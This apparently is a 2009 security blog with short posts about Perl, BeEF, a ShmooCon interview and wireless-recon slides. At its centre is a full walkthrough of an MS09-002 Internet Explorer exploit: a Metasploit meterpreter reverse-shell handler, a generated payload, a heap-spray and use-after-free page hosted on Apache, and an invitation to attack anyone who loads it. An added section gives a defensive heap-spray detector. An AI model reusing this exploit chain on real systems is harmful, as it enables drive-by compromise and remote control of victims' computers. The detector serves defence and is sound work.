Song that encompasses my thoughts on Perl 

For those of you that know me, chatted with me in IRC, met me at a con, I'm sure you will agree with me on this:

http://www.youtube.com/watch?v=Fcd3XuQwDQQ

Perl FTW!

Regards,
Jabra

BeEF, now with MS09-002 goodness!! 

http://www.bindshell.net/entry/50

Enough said. Happy 0wnage!

Regards,
Jabra


MS09-002 Exploit 

If you were at ShmooCon, you may have heard the following phrase a few times: "Let's pop a box".

Okay, sure, why not. So there was a recent IE vulnerability released with an exploit on milw0rm.

First, Metasploit with Meterpreter on the attack box 192.168.1.50:

./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 443
exploit -j

(Note: 192.168.1.50 is the attack system that will receive the connection back.)

We will be attacking anyone that loads this page.

Initial setup:

echo '<html>  <script language="JavaScript">' > ms09-002.html

Now setting up the Metasploit payload:

./msfpayload windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 \
LPORT=443 J | ./payloadproper.pl >> ms09-002.html

Append the milw0rm exploit to the end of the file.

http://milw0rm.org/exploits/8077

echo '
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(j=0; j<0xC0; j++) {
array[j] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
</html>' >> ms09-002.html

Time to start Apache and copy the attack to the webroot.

sudo /etc/init.d/apache2 start
sudo cp ms09-002.html /var/www
sudo chmod 755 /var/www/ms09-002.html

Okay, just get a client to open ms09-002.html and enjoy!!!!!!!

See everyone in Orlando at Infosec World. More details to come later.

-Jabra
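
A defender's view of the page built above, as an added example that is not part of the original post: a static heuristic that flags the heap-spray constructs visible in that JavaScript (repeated-byte unescape() filler, a string-doubling loop, an explicit CollectGarbage() call). The function names, the two-indicator threshold, the 64-unit blob threshold and both sample inputs are assumptions constructed for this example.

```python
import re

# Patterns keyed to constructs visible in the page's JavaScript.
UNESCAPE = re.compile(r'unescape\(\s*["\']((?:%u[0-9a-f]{4})+)', re.I)
UNIT = re.compile(r'%u([0-9a-f]{4})', re.I)
DOUBLING = re.compile(
    r'while\s*\(\s*(\w+)\.length\s*<[^)]*\)\s*\{?\s*\1\s*\+=\s*\1\b')
FORCED_GC = re.compile(r'\bCollectGarbage\s*\(\s*\)')
LONG_BLOB_UNITS = 64  # assumed threshold for a "large encoded blob"

# Constructed sample: indicator lines only, no payload and no trigger.
SPRAY_SAMPLE = r'''<script>
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
CollectGarbage();
</script>'''

# Constructed benign sample: ordinary unescape() of accented text.
BENIGN_SAMPLE = r'''<script>
var title = unescape("%u00e9t%u00e9 2009");
while (i < items.length) { total += items[i++]; }
</script>'''

def scan(html):
    """Return the sorted names of heap-spray indicators found in html."""
    hits = set()
    for m in UNESCAPE.finditer(html):
        units = [u.lower() for u in UNIT.findall(m.group(1))]
        # Filler like %u0C0C%u0C0C: one byte value repeated in every unit.
        same_byte = all(u[:2] == u[2:] for u in units)
        if len(units) >= 2 and same_byte and len(set(units)) == 1:
            hits.add("repeated-byte-filler")
        if len(units) >= LONG_BLOB_UNITS:
            hits.add("long-encoded-blob")
    if DOUBLING.search(html):
        hits.add("string-doubling-loop")  # x += x until a size target
    if FORCED_GC.search(html):
        hits.add("forced-gc")  # IE-only explicit garbage collection
    return sorted(hits)

def is_suspicious(html, threshold=2):
    """Flag content that shows at least `threshold` distinct indicators."""
    return len(scan(html)) >= threshold

if __name__ == "__main__":
    for name, doc in (("spray", SPRAY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan(doc), is_suspicious(doc))
```

A single indicator stays below the threshold on purpose, since each construct also appears in legitimate scripts; it is the combination that is characteristic of a spray.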


Hak5 Interview at ShmooCon 2009 

http://www.hak5.org/episodes/episode-426

http://www.youtube.com/watch?v=srI8QI7DKiU

The interview with me starts at the 8th minute. I talk about the wireless visualization software I released at ShmooCon called GISKismet.

Thanks again to Mister_X for helping out with the domain!

Regards,
Jabra

ShmooCon 2009 Slides - Next Generation Wireless Recon, Visualizing The Airwaves 

Here are the slides from our talk at ShmooCon 2009:

Abraham-Smith-ShmooCon2009

It was great to meet everyone. Please send me comments and suggestions or post tickets at http://www.giskismet.org

I'm looking forward to getting more feedback on ways to improve the software.

Regards,
Jabra